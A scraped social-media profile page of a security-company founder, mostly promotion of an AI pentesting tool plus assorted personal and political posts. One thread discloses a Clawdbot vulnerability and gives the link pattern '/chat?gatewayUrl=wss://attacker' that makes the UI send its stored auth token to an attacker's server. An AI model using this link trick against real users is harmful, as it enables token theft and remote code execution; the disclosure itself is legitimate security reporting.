Olivia
Online
Jorge Monteiro
@jbmonteiro
entrepreneur, dad, explorer | co-founder @ethiack
Portugal
Joined August 2018
493 Following
121 Followers
70 Posts
@steipete No, vulns happen always.
But vendors shall be responsible for testing their products. In this case we tested it for you.
You’re welcome
🚨We found RCE in Clawdbot 🚨
If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.
The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian".
Here's how it went down 👇
We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load.
Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏
On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token!
Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇
https://t.co/nnoOClDYx8
Hackian just uncovered a high-severity vulnerability and achieved 1-click RCE in @openclaw (previously Clawdbot), fully autonomously, in under 2 hours.
We explain how and show you Hackian’s thought process in our latest blog: https://t.co/3SZcKoNuAn
We’ve just analyzed 50,000 assets from European Retail companies.
And there are some concerning data points:
16% of connections use invalid or outdated SSL certificates.
17% of web servers expose their version number, easing criminal exploitation.
Medium-sized retailers, in the 1000-5000 employee range, have the worst posture.
Our new “State of Digital Exposure for European Retail” report uses this data, industry trends, and insights from experts at Nemlig, Carrefour, and others to show what’s to come in Retail.
Read the report and find out what you have to do to stop being a statistic.
Fully accessible here: https://t.co/f3kwKcU7AE
In the AI era, traditional security scanners are obsolete. Ethiack CEO and Founder Jorge Monteiro discusses the transition to autonomous technology that mimics the behavior of real hackers 👇
We’re now detecting the new MongoDB's Memory Exposure Vulnerability.
This CVSS 8.7 vulnerability lets unauthenticated attackers read uninitialized heap memory from MongoDB servers, without needing credentials.
Affected versions span MongoDB 3.6 through 8.2. If you're running any of these versions, your database is exposed.
We’re already detecting this vulnerability across your attack surface, so if you’re unsure you’re exposed, check your dashboard.
More info on the CVE here: https://t.co/K9TnadY0hi
@levelsio @philipcurryo @ethiack we can autonomously pentest your systems continuously. I am sure we will hack your vibe code applications.
This week two massive CVEs affecting React and Next.js were released, with massive repercussions.
CVE-2025-55182 and CVE-2025-66478 are critical unauthenticated RCE vulnerabilities affecting even default configurations.
After the CVE was announced, we've begun working on a testing module, and we've started testing customers today.
If you use React or Next.js, please upgrade to an hardened release immediately.
@levelsio If you are selected with that application, I quit Europe for good
You’re about to see the world’s first show & tell from a hackbot. Enjoy!
Big things brewing in Lisbon: @ethiack and my friend @0xacb are putting together a massive in person conference! It's all about hacking, security, and AI.
Speakers from @hacker0x01, @bedrocksec, @0xLupin and more. Solid crew, great vibes.
👉🏼 https://t.co/fU6erQ38B0
Elon and Steve Jobs are both famous for pushing people to simplify their designs. I don't think this is a coincidence. Large organizations naturally generate complexity, but if you have a CEO who hates it, this tendency is kept in check.
@levelsio Portugal is a paradise land governed by demons
🚨🇦🇷MILEI’S “CRAZY” PLAN WORKED—ARGENTINA’S PAYCHECKS JUST HIT A 6-YEAR HIGH
Private sector wages in Argentina just spiked to their best level since 2018—real wages hit 107 in Feb 2025, up from a sad 91 in late 2023.
What changed? Oh, just Milei dropping economic reforms like they were hot. People called it “shock therapy.” Turns out, it was more “money therapy.”
Critics yelled, “He’ll crash the economy!” Workers are now yelling, “Payday!”
Love him or hate him, Milei’s free-market rollercoaster is actually handing folks fatter checks—for the first time in forever.
Source: Observatory of Employment and Business Dynamics, @JMilei, @ArgMilei
A bola nao tem de ir ao povo, o povo vem à bola
@johnrushx Interested!
@johnrushx Count me in
If you are in SaaS in 2024, and you are not investing in cybersecurity you are irresponsible
Doing technology without testing is careless.
You are putting yourself and your customers in danger.
Change my mind.
Last Seen Users on Sotwe
Most Popular Users
Elon Musk 
@elonmusk
240.3M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.6M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.7M followers
KATY PERRY
@katyperry
87.2M followers
Taylor Swift
@taylorswift13
81M followers
Lady Gaga
@ladygaga
72.5M followers
Kim Kardashian
@kimkardashian
69.6M followers
Virat Kohli
@imvkohli
69.1M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.6M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.8M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.3M followers